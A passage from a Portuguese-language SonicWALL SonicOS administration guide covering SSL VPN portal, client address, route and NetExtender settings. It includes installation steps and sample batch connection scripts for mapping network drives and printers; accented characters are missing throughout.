Habilitar preferncia de criptografia de servidor: Selecione esta caixa de seleo para
configurar um mtodo de criptografia preferido. Os cdigos disponveis so RC4_MD5,
3DES_SHA1 e AES256_SHA1.
Configuraes de usurio RADIUS: Esta opo s est disponvel quando o RADIUS ou
LDAP est configurado para autenticar usurios de SSL VPN. Selecione a caixa de
seleo Usar RADIUS em para que RADIUS use o modo MSCHAP (ou MSCHAPv2).
Habilitar o modo MSCHAP RADIUS permitir que os usurios alterem senhas expiradas
no momento de login.

Nota No LDAP, as atualizaes de senha podem ser feitas somente ao usar o Novell eDirectory
ou o Active Directory com TLS e estabelecendo uma ligao a ele usando uma conta de
administrador. Se o LDAP no estiver configurado como tal, as atualizaes de senha para
usurios de SSL VPN sero executadas usando RADIUS de modo MSCHAP, aps usar o
LDAP para autenticar o usurio.
SSL VPN > Configuraes do Portal

A pgina SSL VPN > Configuraes do portal usada para configurar a aparncia e a
funcionalidade do portal da web do SSL VPN Virtual Office. O portal Virtual Office um web
site que usa o login para iniciar o NetExtender. Pode ser personalizado para correspondncia
a qualquer estilo existente de web site da empresa ou estilo de design.
As definies a seguir configuram a aparncia do portal Virtual Office:

Ttulo do Portal de Site -o texto exibido no ttulo superior do navegador da web.
Ttulo do Banner do Portal - o texto exibido prximo o logotipo na parte superior da
pgina.
Mensagem da Pgina Inicial -o cdigo HTML que exibido acima do cone do
NetExtender.
Mensagem de login - o cdigo HTML o que exibido quando os usurios so solicitados
a efetuar login no Virtual Office.
Modelo de Exemplo -redefine os campos da Mensagem da pgina Inicial e Mensagem de
Login para o modelo de exemplo padro.
Visualizar -inicia uma janela pop-up que exibe o cdigo HTML.
As seguintes opes personalizam a funcionalidade do portal Virtual Office:

Iniciar NetExtender aps login - automaticamente inicia o NetExtender aps um usurio
efetuar login.
Boto Exibir certificado de importao -exibe um botoCertificado de importao na
pgina do Virtual Office. Isso inicia o processo de importao de certificado autoassinado
do firewall para o navegador da web. Esta opo se aplica somente para o navegador
Internet Explorer em computadores que executam Windows 2000 ou Windows XP.
Habilitar meta tags HTTP para controle de cache - insere tags HTTP no navegador que
instrui o navegador da web a no fazer o cache da pgina do Virtual Office. A SonicWALL
recomenda a habilitao desta opo.
O campo Logotipo Personalizado exibe um logotipo diferente do logotipo da Dell SonicWALL
na parte superior do portal Virtual Office. Insira a URL do logotipo no campo Logotipo
Personalizado. O logotipo deve estar no formato GIF com tamanho de 155 x 36 e
recomendado um fundo claro ou transparente.

SSL VPN > Configuraes do Cliente
A pgina SSL VPN > Configuraes do cliente permite que o administrador habilite o acesso
SSL VPN em zonas e configure as informaes de intervalo de endereo do cliente e as
configuraes do cliente NetExtender. Tambm mostra qual zona tem o acesso SSL VPN
habilitado.
As tarefas a seguir so configuradas na pgina SSL VPN > Configuraes do cliente:

Configurao de Zonas para Acesso SSL VPN na pgina 897
Configurao do Intervalo de Endereo do Cliente SSL VPN na pgina 897
Configuraes das definies do cliente NetExtender na pgina 898

Configurao de Zonas para Acesso SSL VPN
Todas as zonas no firewall so exibidas na seo Status de SSL VPN em zonas da pgina
SSL VPN > Configuraes do cliente. O acesso SSL VPN deve estar habilitado em uma zona
antes que os usurios possam acessar o portal da web do Virtual Office. Um botoverde
esquerda do nome da zona indica que o acesso SSL VPN est habilitado. Um boto vermelho
indica que o acesso SSL VPN est desabilitado. Para alterar o acesso SSL VPN a uma zona,
simplesmente clique no nome da zona na pgina SSL VPN > Configuraes do cliente.
O acesso VPN SSL tambm pode ser configurado na pgina Rede > Zonas clicando no cone
de configurao da zona.
Nota Para que o SonicOS encerre sesses SSL VPN, HTTPS para Gerenciamento ou Login do
usurio deve estar habilitado na pgina Rede > Interfaces , na caixa de dilogo Editar
Interface para a interface de WAN.
Configurao do Intervalo de Endereo do Cliente SSL VPN

O intervalo de endereo do cliente SSL VPN define o pool de Endereo IP do qual os
endereos sero atribudos aos usurios remotos durante sesses do NetExtender. O intervalo
precisa ser grande o suficiente para acomodar o nmero mximo de usurios simultneos do
NetExtender que voc deseja suportar e mais um (por exemplo, o intervalo para 15 usurios
requer 16 endereos, como 192.168.200.100 a 192.168.200.115).
Nota O intervalo deve estar dentro da mesma sub-rede que a interface qual o dispositivo SSL
VPN est conectado e, em casos onde h outros hosts no mesmo segmento, como o
dispositivo SSL VPN, ele no deve se sobrepem ou entrarem em conflito com quaisquer
endereos atribudos.
Para configurar o intervalo de endereo do cliente SSL VPN, execute as seguintes etapas:
Etapa 1 Navegue at a pgina SSL VPN > Configuraes do cliente.
Intervalo de endereos de cliente SSLVPN

Etapa 2 No campo IP inicial NetExtender, digite o primeiro Endereo IP no intervalo de endereos do
cliente.
Etapa 3 No campo IP final NetExtender, digite o ltimo Endereo IP no intervalo de endereos do
cliente.
Etapa 4 No campo Servidor DNS 1, insira o Endereo IP do servidor DNS primrio ou clique em
Configuraes de DNS padro para usar as configuraes padro.
Etapa 5 (Opcional) No campo Servidor DNS 2, insira o Endereo IP do servidor DNS de backup.
Etapa 6 (Opcional) No campo Domnio DNS, insira o nome de domnio para os servidores DNS.
Etapa 7 No campo Domnio de usurio, insira o nome de domnio para os usurios. O valor deste
campo deve corresponder ao campo de domnio no cliente NetExtender.
Etapa 8 (Opcional) No campo Servidor WINS 1, insira o Endereo IP do servidor WINS primrio.
Etapa 9 (Opcional) No campo Servidor WINS 2, insira o Endereo IP do servidor WINS de backup.
Etapa 10 No menu suspenso Interface, selecione a interface a ser usada para servios de SSL VPN.

Nota O intervalo de Endereo IP deve estar na mesma sub-rede que a interface usada para
servios de SSL VPN.
Etapa 11 Clique no nome de zona na parte superior da pgina para habilitar o acesso SSL VPN a ela
com essas configuraes. O indicador deve ser verde para a Zona que voc deseja habilitar.
Configuraes das definies do cliente NetExtender

As definies de cliente NetExtender so configuradas na parte inferior da pgina SSL VPN >
Configuraes do cliente. As configuraes a seguir para personalizar o comportamento do
NetExtender quando os usurios se conectam e desconectam.
Configuraes de cliente NetExtender

Tempo limite de sesso padro (minutos) - o valor de tempo limite padro para
inatividade do cliente, aps o qual a sesso do cliente encerrada.
Habilitar Gerenciamento da Web em SSLVPN Habilita ou desabilita o cliente
NetExtender para que ele seja gerenciado em uma conexo do SSLVPN usando um
navegador da Web.
Habilitar Gerenciamento SSH em SSLVPN Habilita ou desabilita o cliente NetExtender
para que ele seja gerenciado em uma conexo do SSLVPN usando um aplicativo Secure
Shell (SSH).
Habilitar NetBIOS em SSLVPN - permite que clientes NetExtender divulguem NetBIOS
para a sub-rede SSL VPN.
Habilitar atualizao automtica de cliente - o cliente NetExtender verifica se h
atualizaes a cada vez que ele iniciado.
Sair do cliente aps desconectar - o cliente NetExtender ser encerrado quando ele
desconectado do servidor SSL VPN. Para se reconectar, os usurios tero retornar ao
portal SSL VPN ou iniciar o NetExtender a partir de seu menu Programas.
Desinstalar cliente aps sair O cliente NetExtender automaticamente desinstalado
quando ele desconectado do servidor SSL VPN. Para se reconectar, os usurios tero
que retornar ao portal SSL VPN.
Criar perfil de conexo do cliente - o cliente NetExtender ir criar um perfil de conexo
gravando o nome do servidor SSL VPN, o nome de domnio e, opcionalmente, o nome de
usurio e senha.
Comunicao entre clientes - habilita clientes NetExtender que esto conectados ao
mesmo servidor para se comunicar.
Nome de usurio e Cache de Senha - oferece flexibilidade ao permitir que os usurios
realizem cache de seus nomes de usurio e senha no cliente NetExtender. As trs opes
so Permitir salvar somente nome de usurio, Permitir salvar nome de usurio e
senha e Proibir salvar nome de usurio e senha. Essas opes permitem que os
administradores equilibrem as necessidades de segurana em relao facilidade de uso
para os usurios.

SSL VPN > Rotas de clientes
A pgina SSL VPN > pgina Rotas de cliente permite ao administrador controlar o acesso
rede permitido para usurios de SSL VPN. As rotas de cliente NetExtender so passadas para
todos os clientes NetExtender e so usadas para controlar quais redes particulares e recursos
os usurios remotos podem acessar por meio da conexo SSL VPN.
As tarefas a seguir so configuradas na pgina SSL VPN > Rotas de cliente:

Configurao do modo Todos tneis na pgina 899
Adio de rotas de cliente: na pgina 900
Configurao do modo Todos tneis

Selecione Habilitado da lista suspensa Modo todos tneis para forar o trfego de usurios
NetExtender atravs do tnel SSL VPN NetExtender incluindo o trfego destinado para
rede local do usurio remoto. Isso feito adicionando as seguintes rotas tabela de
roteamento do cliente remoto:
Endereo IP Mscara de sub-rede

0.0.0.0 0.0.0.0
0.0.0.0 128.0.0.0
128.0.0.0 128.0.0.0
O NetExtender tambm adiciona rotas para as redes locais de todas as conexes de rede
conectadas. Essas rotas so configuradas com mtricas mais altas do que todas as rotas
existentes para forar o trfego destinado para a rede local atravs do tnel SSL VPN. Por
exemplo, se um usurio remoto tem o Endereo IP 10.0.67.64 na rede 10.0. *. *, a rota
10.0.0.0/255.255.0.0 adicionada para rotear o trfego por meio do tnel SSL VPN.
Nota Para configurar o Modo Todos tneis, voc tambm deve configurar um objeto de endereo
para 0.0.0.0 e atribuir grupos e usurios SSL VPN do NetExtender para ter acesso a este
objeto de endereo.
Para configurar grupos e usurios de SSL VPN NetExtender para o Modo Todos tneis,
execute as etapas a seguir.

Etapa 1 Navegue at a pgina Usurios > Usurios locais ou a pgina Usurios > Grupos locais.
Etapa 2 Clique no boto Configurar para um usurio o grupo SSL VPN NetExtender.
Etapa 3 Clique na guia Acesso VPN.
Etapa 4 Selecione o objeto de endereo Redes de Acesso Remoto WAN e clique no boto de seta
direita (->).
Etapa 6 Repita as etapas 1 a 5 para todos os usurios locais e grupos que usam SSL VPN NetExtender.
Adio de rotas de cliente:

O menu suspenso Adicionar Rotas de cliente usado para configurar o acesso aos recursos
da rede para usurios SSL VPN. Selecione o objeto de endereo para o qual voc deseja
permitir o acesso SSL VPN. Selecione Criar novo objeto de endereo para criar um novo
objeto de endereo. Criar rotas de cliente faz com que as regras de acesso sejam criadas
automaticamente para permitir esse acesso. Como alternativa, voc pode configurar
manualmente as regras de acesso para a zona SSL VPN na pgina Firewall > Regras de
acesso. Para obter mais informaes, consulte Firewall > Regras de acesso na pgina 555.
Nota Depois de configurar as Rotas de cliente SSL VPN, voc tambm deve configurar todos os
usurios e grupos de usurios SSL VPN do NetExtender para poder acessar as Rotas de
cliente nas pginas Usurios > Usurios locais ou Usurios > Grupos locais.
Para configurar grupos e usurios SSL VPN NetExtender para acessar as Rotas de cliente,
execute as etapas a seguir.
Etapa 1 Navegue at a pgina Usurios > Usurios locais ou a pgina Usurios > Grupos locais.
Etapa 2 Clique no boto Configurar para um usurio o grupo SSL VPN NetExtender.
Etapa 3 Clique na guia Acesso VPN.
Etapa 4 Selecione o objeto de endereo para a Rota do cliente e clique no boto de seta direita (->).
Etapa 6 Repita as etapas 1 a 5 para todos os usurios locais e grupos que usam SSL VPN NetExtender.

SSL VPN > Virtual Office
O SSL VPN > Virtual Office pgina exibe o portal da web Virtual Office dentro de UI do
SonicOS.
As sees a seguir descrevem como usar o Virtual Office:

Acesso ao Portal SSL VPN na pgina 901
Uso do NetExtender na pgina 901
Configurao de Marcadores SSL VPN na pgina 927
Uso de Marcadores SSL VPN na pgina 931
Acesso ao Portal SSL VPN

Para exibir o portal da web SSL VPN Virtual Office, navegue at o Endereo IP do firewall.
Clique no link na parte inferior da pgina de Login que diz "Clique aqui para login sslvpn."
Uso do NetExtender
As sees a seguir descrevem como usar o NetExtender:
Pr-requisitos de usurio na pgina 901
Tarefas de configurao do usurio na pgina 902
Verificao da operao do NetExtender da bandeja do Sistema na pgina 919
Pr-requisitos de usurio
Pr-requisitos para clientes Windows:
Os clientes Windows devem atender aos seguintes pr-requisitos para usar o NetExtender:
Uma das seguintes plataformas:
Windows Vista 4 bits, Windows Vista 32 bits, Windows XP Home ou Professional,
Windows 2000 Professional, Windows 2000 Server, Windows 2003 Server.
Um dos navegadores a seguir:
Internet Explorer:

Mozilla Firefox
Para instalar o cliente NetExtender inicialmente, o usurio deve efetuar login no PC com
privilgios administrativos.
Baixar e executar arquivos de script ActiveX deve estar habilitado no Internet Explorer.
Se o firewall usa um certificado autoassinado SSL para autenticao HTTPS, ento,
necessrio instalar o certificado antes de estabelecer uma conexo com o NetExtender. Se
voc no tiver certeza se o certificado autoassinado ou gerado por uma autoridade de
Certificado raiz confivel, a SonicWALL recomenda que voc importe o certificado. A
maneira mais fcil para importar o certificado clicar no boto Importar Certificado na
parte inferior da pgina inicial do Virtual Office.
Pr-requisitos para clientes MacOS:

Os clientes MacOS atendem aos seguintes pr-requisitos para usar o NetExtender:
MacOS 10.4 e posterior
Java 1.4 e superior
Ambos PowerPC e Intel Macs so suportados.
Pr-requisitos para clientes Linux:

Clientes Linux devem atender aos seguintes pr-requisitos para usar o NetExtender:
Linux Fedora Core 3 ou superior, Ubuntu 7 ou superior ou OpenSUSE
Sun Java 1.4 e superior necessria para usar a GUI do NetExtender.
Nota Mquinas virtuais (VMs) Java Open source no so suportados no momento. Se voc no
tem Sun Java 1.4, voc pode usar a verso da interface da linha de comando do
NetExtender.
Tarefas de configurao do usurio

O SonicWALL NetExtender um aplicativo de software que permite que usurios remotos se
conectem com segurana rede remota. Com o NetExtender, os usurios remotos podem se
associar virtualmente rede remota. Os usurios podem montar unidades de rede, fazer
upload e download de arquivos e acessar os recursos da mesma forma como se estivessem
na rede local.
As sees a seguir descrevem como instalar o NetExtender em uma plataforma Windows:
Instalao do NetExtender usando o Navegador Mozilla Firefox na pgina 903
Instalao do NetExtender usando o Navegador Internet Explorer na pgina 905
As sees a seguir descrevem como usar o NetExtender em uma plataforma Windows:
Iniciar NetExtender diretamente do seu computador na pgina 910
Configurao das Preferncias do NetExtender na pgina 911
Configurao de Scripts de Conexo do NetExtender na pgina 913
Configurao de Configuraes de Proxy na pgina 915
Visualizao do Log do NetExtender na pgina 916
Desconexo do NetExtender na pgina 918
Atualizao do NetExtender na pgina 918
Desinstalao do NetExtender na pgina 918
Verificao da operao do NetExtender da bandeja do Sistema na pgina 919
A seo a seguir descreve como instalar e usar o NetExtender em uma plataforma MacOS:
Instalao do NetExtender em MacOS na pgina 920

Uso do NetExtender em MacOS na pgina 921
A seo a seguir descreve como instalar e usar o NetExtender em uma plataforma Linux:
Instalao e uso do NetExtender no Linux na pgina 924
Instalao do NetExtender usando o Navegador Mozilla Firefox
Para usar o NetExtender pela primeira vez com o navegador Mozilla Firefox, execute o
seguinte procedimento:
Etapa 1 Navegue at o Endereo IP do firewall. Clique no link na parte inferior da pgina de Login que
diz "Clique aqui para login sslvpn."
Etapa 2 Clique no boto NetExtender.
Etapa 3 A primeira vez que voc iniciar o NetExtender, ele ir instalar automaticamente o aplicativo
autnomo NetExtender em seu computador. Se uma mensagem de aviso for exibida em uma
faixa amarela na parte superior do seu banner Firefox, clique no boto Editar Opes...

Etapa 4 A janela Sites permitidos - Instalao do Software exibida, com o endereo do servidor
Virtual Office na janela de endereo. Clique em Permitir para permitir que o Virtual Office
instale o NetExtender e clique em Fechar.
Etapa 5 Volte para a janela Virtual Office e clique em NetExtender novamente.

Etapa 6 A janela Instalao do Software exibida. Aps a contagem de regressiva cinco segundos, o
boto Instalar Agora se tornar ativo. Clique .
Etapa 7 O NetExtender instalado como uma extenso do Firefox.
Etapa 8 Quando NetExtender concluir a instalao, a janela Status do NetExtender ser exibida,
indicando que o NetExtender conectado com xito.

Fechar as janelas (clicando no cone de x no canto superior direito da janela) no fechar a
sesso do NetExtender, mas ela ser minimizada para a bandeja do sistema para operao
contnua.
Etapa 9 Revise a tabela a seguir para compreender os campos na janela Status do NetExtender.
Campo Descrio
Status Indica em que estado operacional o cliente NetExtender est,
Conectado ou Desconectado.
Servidor Indica o nome do servidor ao qual o cliente NetExtender conectado.
Cliente IP Indica o Endereo IP atribudo ao cliente NetExtender.
Enviado Indica a quantidade de trfego que o cliente NetExtender transmitiu
desde a conexo inicial.
Recebido Indica a quantidade de trfego que o cliente NetExtender recebeu
desde a conexo inicial.
Durao A quantidade de tempo que o NetExtender ficou conectado, expressa
em dias, horas, minutos e segundos.
Etapa 10 Alm disso, um cone de balo na bandeja do sistema exibido, indicando que o NetExtender
foi instalado com xito.
Etapa 11 O cone do NetExtender exibido na barra de tarefas.
Instalao do NetExtender usando o Navegador Internet Explorer
O SonicWALL SSL VPN NetExtender totalmente compatvel com Microsoft Windows Vista 32
bits e 64 bits e suporta a mesma funcionalidade dos outros sistemas operacionais Windows.
Nota Pode ser necessrio reiniciar seu computador durante a instalao do NetExtender no
Windows Vista.

Pr-requisitos do Internet Explorer
recomendvel que voc adicione o nome de domnio ou URL do seu firewall lista de sites
confiveis do Internet Explorer. Isso simplificar o processo de instalao e login do
NetExtender, reduzindo o nmero de avisos de segurana que voc receber. Para adicionar
um site lista de sites confiveis do Internet Explorer, conclua o procedimento a seguir:
Etapa 1 No Internet Explorer, v para Ferramentas > Opes de Internet.

Etapa 2 Clique na guia Segurana.
Etapa 3 Clique no cone Sites Confiveise clique no boto Sites... para abrir a janela Sites
Confiveis.
Etapa 4 Insira o nome de domnio ou URL do seu firewall no campo Adicionar este site da Web zona
e clique em Adicionar.
Etapa 5 Clique em OK nas janelas Sites Confiveis e Opes de Internet.

Instalao do NetExtender a partir do Internet Explorer
Para instalar e iniciar o NetExtender pela primeira vez usando o navegador Internet Explorer,
execute o seguinte procedimento:
Etapa 3 A primeira vez que voc iniciar o NetExtender, voc deve adicionar o portal SSL VPN sua
lista de sites confiveis. Se voc no tiver feito isso, a mensagem a seguir ser exibida.

Etapa 4 Clique em Instrues para adicionar o endereo do servidor SSL VPN aos sites
confiveis para obter ajuda.
Etapa 5 No Internet Explorer, v para Ferramentas > Opes de Internet.

Etapa 6 Clique na guia Segurana.
Etapa 7 Clique no cone Sites Confiveise clique no boto Sites... para abrir a janela Sites
Confiveis.

Etapa 8 Insira o nome de domnio ou URL do seu firewall no campo Adicionar este site da Web zona
e clique em Adicionar.
Etapa 9 Clique em OK nas janelas Sites Confiveis e Opes de Internet.
Etapa 10 Retorne ao portal SSL VPN e clique no boto NetExtender. O portal instalar automaticamente
o aplicativo autnomo NetExtender em seu computador. A janela do instalador do NetExtender
aberta.
Etapa 11 Se uma verso mais antiga do NetExtender estiver instalada no computador, o recurso Iniciar
NetExtender remover a verso antiga e, em seguida, instalar a nova verso.
Etapa 12 Se for exibida uma mensagem de aviso que o NetExtender no passou no teste de logotipo do
Windows, clique em Continuar assim mesmo. O teste do SonicWALL constatou que
NetExtender totalmente compatvel com Windows Vista, XP, 2000 e 2003.

Etapa 13 Quando NetExtender concluir a instalao, a janela Status do NetExtender ser exibida,
indicando que o NetExtender conectado com xito.
Iniciar NetExtender diretamente do seu computador
Aps o primeiro acesso e instalao do NetExtender, voc pode iniciar o NetExtender

diretamente do seu computador sem primeiro ter de navegar ao portal SSL VPN. Para iniciar
o NetExtender, conclua o procedimento a seguir:
Etapa 1 V at Iniciar > Todos os Programas.

Etapa 2 Selecione o diretrio SSL VPN NetExtender e, em seguida, clique em SonicWALL SSL VPN
NetExtender. A janela de login do NetExtender exibida.
Etapa 3 O Endereo IP do ltimo servidor que voc conectou exibido no campo Servidor SSL VPN.
Para exibir uma lista de servidores recentes ao quais voc se conectou, clique na seta.
Etapa 4 Insira seu nome de usurio e a senha.

Etapa 5 O ltimo domnio que voc conectou exibido no campo Domnio.
Etapa 6 O menu suspenso na parte inferior da janela oferece trs opes para memorizar seu nome de
usurio e senha:
Salvar nome de usurio e senha, se o servidor permitir
Salvar apenas nome de usurio, se o servidor permitir
Sempre pedir nome de usurio e senha

Dica Ter seu nome de usurio e senha salvos no NetExtender pode ser um risco de segurana
e no devem ser ativado se h chances de que outras pessoas possam usar seu
computador para acessar informaes confidenciais na rede.
Configurao das Preferncias do NetExtender
Conclua o seguinte procedimento para configurar as preferncias do NetExtender:
Etapa 1 Clique com o boto direito no cone na bandeja do sistema e clique em Preferncias...
A janela Preferncias do NetExtender: exibida.
Etapa 2 A guia Perfis de conexo exibe os perfis de conexo SSL VPN que voc usou, incluindo o
Endereo IP do servidor, o domnio e o nome de usurio.
Etapa 3 Para excluir um perfil, destaque-o clicando sobre ele e, em seguida, clique nos botes
Remover. Clique no boto Remover todos para excluir todos os perfis de conexo.

Etapa 4 A guia Configuraes permite que voc personalize o comportamento do NetExtender.
Etapa 5 Para que o NetExtender se conecte automaticamente quando voc iniciar o seu computador,
verifique se a caixa de seleo Conectarautomaticamente com o Perfil de Conexo e
selecione a conexo apropriada no menu suspenso.
Nota Somente os perfis de conexo que permitem que voc salve seu nome de usurio e senha
podem ser definidos para se conectar automaticamente.
Etapa 6 Para que o NetExtender inicie quando voc efetuar login no seu computador, marque Iniciar
automaticamente a interface de usurio NetExtender. O NetExtender ser iniciado, mas s
ser exibido na bandeja do sistema. Para que a janela de login do NetExtender seja exibida,
marque a caixa de seleo Exibir interface de usurio NetExtender.
Etapa 7 Selecione Minimizar para o cone da bandeja quando a janela do NetExtender for fechada
para que o cone do do NetExtender seja exibido na bandeja do sistema. Se essa opo no
estiver marcada, voc s poder acessar a IU do NetExtender por meio do menu de programas
do Windows.
Etapa 8 Selecione Exibir dicas para Conectar/Desconectar da bandeja do sistema para que o
NetExtender exiba dicas ao passar o mouse sobre o cone do NetExtender.
Etapa 9 Selecione Reconectar automaticamente quando a conexo for encerrada para que o
NetExtender tente se reconectar-se quando perder a conexo.
Etapa 10 Selecione NetExtender desinstalar automaticamente para que o NetExtender se desinstale
a cada vez que voc encerrar uma sesso.
Etapa 11 Selecione Desconectar uma conexo ativa para que o NetExtender faa logout de todas as
suas sesses SSL VPN quando voc sai de uma sesso NetExtender.

Configurao de Scripts de Conexo do NetExtender
O SonicWALL SSL VPN fornece aos usurios a capacidade de executar scripts de arquivos em
lote quando o NetExtender se conecta e desconecta. Os scripts podem ser usados para
mapear ou desconectar unidades de rede e impressoras, iniciar aplicativos ou abrir arquivos
ou sites da Web. Para configurar Scripts de Conexo do NetExtender, execute as seguintes
tarefas.
Etapa 1 Clique com o boto direito no cone na barra de tarefas e clique em Preferncias... A
janela Preferncias do NetExtender: exibida.
Etapa 2 Clique em Scripts de Conexo.
Etapa 3 Para ativar o script de login do domnio, selecione a caixa de seleo Tentativa de execuo
de script de logon do domnio. Quando habilitado, o NetExtender tentar contatar o
controlador de domnio e executar o script de login.
Nota Habilitar este recurso pode causar atrasos na conexo enquanto as impressoras do cliente
remoto e unidades esto mapeadas. Verifique se o controlador de domnio e todas as
mquinas no script de login so acessveis atravs de rotas NetExtender.
Etapa 4 Para ativar o script que executado quando o NetExtender se conecta, selecione a caixa de
seleo Executar automaticamente o arquivo de lotes "NxConnect.bat".
Etapa 5 Para ativar o script que executado quando se desconecta o NetExtender, selecione a caixa
de seleo Executar automaticamente o arquivo de lotes "NxDisconnect.bat".
Etapa 6 Para ocultar uma das janelas do console, selecione a caixa de seleo Ocultar a janela do
console apropriada. Se esta caixa de seleo no estiver selecionada, a janela do console do
DOS permanecer aberta enquanto o script executado.

Configurao de comandos de arquivos de lotes
Os Scripts de Conexo NetExtender podem oferecer suporte a quaisquer comandos de arquivo
em lotes vlidos. Para obter mais informaes sobre arquivos de lote, consulte a seguinte
entrada na Wikipedia: http://en.wikipedia.org/wiki/.bat. As tarefas a seguir fornecem que uma
Introduo a alguns comandos de arquivos de lotes usados comumente.
Etapa 1 Para configurar o script que executado quando se conecta NetExtender, clique no boto
Editar "NxConnect.bat". O arquivoNxConnect.bat exibido.
Etapa 2 Para configurar o script que executado quando se desconecta o NetExtender, clique no boto
Editar "NxDisconnect.bat". O arquivoNxConnect.bat exibido.
Etapa 3 Por padro, o arquivo NxConnect.bat contm exemplos de comandos que podem ser
configurados, mas nenhum comando real. Para adicionar comandos, deslize at o fim do
arquivo.
Etapa 4 Para mapear uma unidade de rede, insira um comando no seguinte formato:
NET use letra de unidade\ \servidor\senha compartilhamento /user:Domnio\nome
Por exemplo se a letra da unidade z, o nome do servidor engenharia, o compartilhamento

docs, a senha 1234, domnio do usurio eng e o nome de usurio admin, o comando
deve ser o seguinte:
use NET z\\engineering\docs 1234 /user:eng\admin
Etapa 5 Para desconectar uma unidade de rede, insira um comando no seguinte formato:
NET use letra de unidade: /delete
Por exemplo, para desconectar unidade de rede z, digite o seguinte comando:

NET use z: /delete
Etapa 6 Para mapear uma impressora de rede, insira um comando no seguinte formato:
NET use LPT1 \ \ServerName\PrinterName /user:Domnio\nome
Por exemplo, se o nome do servidor engenharia, o nome da impressora color-print1, o

nome de domnio eng, e o nome de usurio admin, o comando deve ser o seguinte:
NET use LPT1 \\engineering\color-print1 /user:eng\admin
Etapa 7 Para desconectar uma impressora de rede, insira um comando no seguinte formato:
NET use LPT1 /delete
Etapa 8 Para iniciar um aplicativo insira um comando no seguinte formato:

C:\caminho-para-Aplicativo\Application.exe
Etapa 9 Por exemplo, para iniciar o Microsoft Outlook, digite o seguinte comando:
C:\Program Files\Microsoft Office\OFFICE11\outlook.exe

Etapa 10 Para abrir um site da Web em seu navegador padro, digite um comando no seguinte formato:
Iniciar http://www.website.com
Etapa 11 Para abrir um arquivo no seu computador, insira um comando no seguinte formato:
C:\caminho para arquivo\myFile.doc
Etapa 12 Quando terminar de editar os scripts, salve o arquivo e feche-o.
Configurao de Configuraes de Proxy
O SonicWALL SSL VPN oferece suporte a sesses do NetExtender usando configuraes de

proxy. Atualmente, h suporte apenas para proxy HTTPS. Ao iniciar o NetExtender do portal
da Web, se seu navegador j est configurado para acesso ao proxy, o NetExtender herda
automaticamente as configuraes de proxy.
Para configurar manualmente as configuraes de proxy do NetExtender, execute as seguintes
tarefas.
Etapa 1 Clique com o boto direito no cone na barra de tarefas e clique em Preferncias... A
janela Preferncias do NetExtender: exibida.
Etapa 2 Clique em Proxy.
Etapa 3 Marque a caixa de seleo Habilitar Configurao de Proxy.

Etapa 4 O NetExtender fornece trs opes para definir as configuraes de proxy:
Detectar automaticamente as configuraes - para usar essa configurao, o
servidor proxy deve oferecer suporte a WPAD (Web Proxy Auto Discovery), que pode
enviar automaticamente o script de configuraes de proxy para o cliente.
Usar configurao automtica de script - se voc souber o local do script de
configuraes proxy , selecione esta opo e insira a URL do script no campo
Endereo.

Usar Servidor proxy -Selecione esta opo para inserir o Endereo e Porta do
servidor proxy. Como alternativa, voc pode inserir um Endereo IP ou Domnio no
campo BypassProxy para permitir conexes diretas a esses endereos que ignoram
o servidor proxy. Se necessrio, digite um de Nome de usurio e Senha para o
servidor proxy. Se o servidor proxy requer um nome de usurio e uma senha, mas voc
no especific-los na janela Preferncias, uma janela pop-up do NetExtender avisar
para inseri-los quando voc se conectar pela primeira vez.
Etapa 5 Clique no boto Configuraes de Proxy do Internet Explorer para abrir as configuraes
de proxy do Internet Explorer.
Visualizao do Log do NetExtender
O log do NetExtender exibe informaes sobre eventos de sesso NetExtender. O log um

arquivo chamado NetExtender.dbg. Ele armazenado no diretrio: C:\Program Files\
SonicWALL\SSL VPN\NetExtender. Para exibir o log do NetExtender, clique com o boto
direito no cone do NetExtender na bandeja do sistema e clique em Ver Log.
Para exibir detalhes de uma mensagem de log, clique duas vezes em uma entrada de log ou
v para Ver > Detalhes do Log para abrir o painel de detalhes do log.
Para salvar o log, clique no cone Exportar ou v para Log > Exportar.
Para filtrar o log para exibir as entradas de uma durao de tempo especfica, v para o menu
Filtro e selecione o limite de fechamento.

Para filtrar o log por tipo de entrada, v para Filtro > Nvel e selecione uma das categorias de
nvel. As opes disponveis so Fatal, Erro, Aviso e Informaes, em ordem decrescente
de gravidade. O log exibe todas as entradas que correspondem ou excedem o nvel de
gravidade. Por exemplo, ao selecionar o nvel Erro, o log exibe todas as entradas Erro e Fatal,
mas no as entradas Aviso ou Informaes.
Para exibir o Log de depurao, clique no cone Depurar Log ou v para Log > Depurar Log.
Nota Pode levar vrios minutos para carregar o log de depurao. Durante esse tempo, a janela
de Log no estar acessvel, embora voc possa abrir uma nova janela de Log enquanto
Depurar Log carregado.
Para limpar o log, clique em Log > Limpar Log.

Desconexo do NetExtender
Para desconectar o NetExtender, execute as seguintes etapas:
Etapa 1 Clique com o boto direito no cone do NetExtender na bandeja do sistema para exibir o menu
do cone do NetExtender e clique em Desconectar.
Etapa 2 Aguarde alguns segundos. A sesso do NetExtender desconectada.
Voc tambm pode desconectar clicando duas vezes no cone do NetExtender para abrir a
janela do NetExtender e, em seguida, clicar no boto Desconectar.
Quando o NetExtender desconectado, a janela do NetExtender exibida e oferece a opo
de Reconectar ou Fechar o NetExtender.
Atualizao do NetExtender
O NetExtender pode ser configurado pelo administrador para notificar os usurios

automaticamente quando uma verso atualizada do NetExtender est disponvel. Os usurios
so solicitados a clicar em OK e o NetExtender baixa e instala a atualizao do firewall.
Se a notificao de atualizao automtica no est configurada, os usurios devem iniciar

periodicamente o NetExtender a partir do Virtual Office para garantir que eles tenham a verso
mais recente. Verifique com seu administrador para determinar se voc precisar verificar as
atualizaes manualmente.
Desinstalao do NetExtender
O utilitrio NetExtender instalado automaticamente no seu computador. Para remover o

NetExtender, clique em Iniciar > Todos os Programas, clique em SonicWALL SSL VPN
NetExtender, e, em seguida, clique em Desinstalar.
Voc tambm pode configurar o NetExtender para desinstalar automaticamente quando sua
sesso desconectada. Para fazer isso, execute as seguintes etapas:
Etapa 1 Clique com o boto direito no cone do NetExtender na bandeja do sistema e clique em
Preferncias... A janela Preferncias do NetExtender exibida.
Etapa 3 Selecione NetExtender desinstalar automaticamente para que o NetExtender se desinstale
a cada vez que voc encerrar uma sesso.

Verificao da operao do NetExtender da bandeja do Sistema
Para exibir opes na bandeja do sistema NetExtender, clique com o boto direito no cone do
NetExtender na bandeja do sistema. A seguir esto algumas tarefas que voc pode executar
na bandeja do sistema.
Exibir informaes de Rota

Para exibir as rotas que o NetExtender instalou no seu sistema, clique na opo Informaes
de Rota no menu da bandeja do sistema. O menu da bandeja do sistema exibe a rota padro
e a mscara de sub-rede associada.
